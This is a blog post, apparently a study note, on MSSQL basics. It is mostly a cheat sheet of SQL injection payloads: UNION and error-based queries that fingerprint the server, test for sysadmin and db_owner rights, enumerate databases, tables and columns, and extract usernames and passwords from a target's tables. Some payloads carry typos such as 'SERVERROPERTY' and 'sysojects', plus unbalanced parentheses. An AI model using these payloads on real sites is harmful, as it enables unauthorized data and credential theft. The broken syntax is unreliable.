526互联

mssql数据库基础

发布时间 2023-07-21 00:05:33作者: lisenMiller

basic conceptions

mssql system table 

  1. sys.objects - contains information about all objects (tables, views, stored procedures, etc.) in the database.
  2. sys.columns - contains information about all columns in all tables in the database.
  3. sys.indexes - contains information about all indexes in the database.
  4. sys.databases - contains information about all databases on the server.
  5. sys.sysusers - contains information about all users in the database.
  6. sys.syslogins - contains information about all logins on the server.
  7. sys.dm_exec_sessions - contains information about all active sessions on the server.
  8. sys.dm_exec_requests - contains information about all active requests on the server.
  9. sys.dm_os_waiting_tasks - contains information about all tasks that are currently waiting for a resource.
  10. sys.dm_tran_locks - contains information about all locks that are currently held in the database.

union all grammer in mssql 

union all is used to combine the result sets of queries into a single result set without removing duplicate rows (include duplicate rows)

the syntax of union all is as follow

select colums from table1 union all select colums from table2

this operator allow us to merge the results of multiple queries into one result set.each part of the query statement must have the same number and order of columns,but the data types can be different.

query mssql's version and db_name

?id=1 and 1=2 union all select 1,(SERVERROPERTY('edition')),'3',4;
?id=1 and 1=2 union all select 1,(@@version),'3',4 
#query db_name
?id=1 and 1=2 union all select null,(select db_name(0)),null,null --+ #we can use db_name(1/2) to query other dababasename
                         the double quotes are used to ensure the data types is consistent

 

query mssql table name 

?id=1 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype ='U'),'3',4

the 'top' keyword since there is no 'limit' in mssql,if we want to retrieve a single row ,we can use 'TOP 1',for tow rows ,use 'TOP 2',

the 'DBO' keyword, dbo is each database default user have owner privilege.

  •   when user2 want  to access table but the table was created by user1.user2 should access with user1.table  in grammer otherwise,the database will throw an error.
  • if the table was created with the owner specified as 'dbo' ,other users can simply write 'dbo.talbe' when accessing it ,without needing to know about user1

the 'sysobjects' and 'xtype' keywords introduction

  • in mssql ,each database has a bulit-in system table called 'sysobjects'.among the useful fields in this system table,there are three:'name' field,'xtype' field,and 'id' field.the name field contains the table name information. 2.the 'xtype' field represent the type of the table,whic has tow parameters -'S' for system tables and 'U' for user-created tables. 3.the 'ID' field value is used to connect with the 'syscolumns' table

query for column name 

?id=1 and 1=2 union all select 1,(select top 1 col_name(object_id(('manage'),1) from sysojects),'3',4
replace the 1 in col_name('manage',1) with'2','3',and'4' respectively to retrieve all column name

col_name is system function,usage : col_name(object_id,col_id)

query for data 

?id=2 and 1=2 union all select 1,(select top 1 username from manage),'3',4 --+#get username
?id=2 and 1=2 union all select 1,(select top 1 password from manage),'3',4 --+

Some commonly used inject commands:

ensure database type : 

  • http://www.xxx.xxx/xxx.asp?id=6 and user>0
  • http://www.xxx.xxx/xxx.asp?id=6 and (select count(*) from sysobjects)>0 # mssql will common retrieve 

and 1=(select IS_SRVROLEMEMBER('sysadmin')) //judge whether is system administrator
and 1=(Select IS_MEMBER('db_owner')) //judge whether is database privilege 
and 1= (Select HAS_DBACCESS('master')) //judge whether have  database read privilege 
and exists(select * from tableName) //judge whether is table name called tableName exist
and 1=(select @@VERSION) //MSSQLversion 
And 1=(select db_name()) //current database name
and 1=(select @@servername) //local server name

//get database (this statement is used to retrieve all database at once and only suitable for version >=2005.tow statements to choose from)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

and db_name()>0 //retrieve current database
retrieve all the table in this database .only suitable for version >=2005.tow statements to choose from)
and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
retrieve data for all fields of a specified table row by row only suitable for mssql version >=2005
and 1=(select top 1 * from 指定数据库..指定表名 where FOR XML PATH(''))--
retrieve lots of data at once only suitable for mssql version >=2005
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--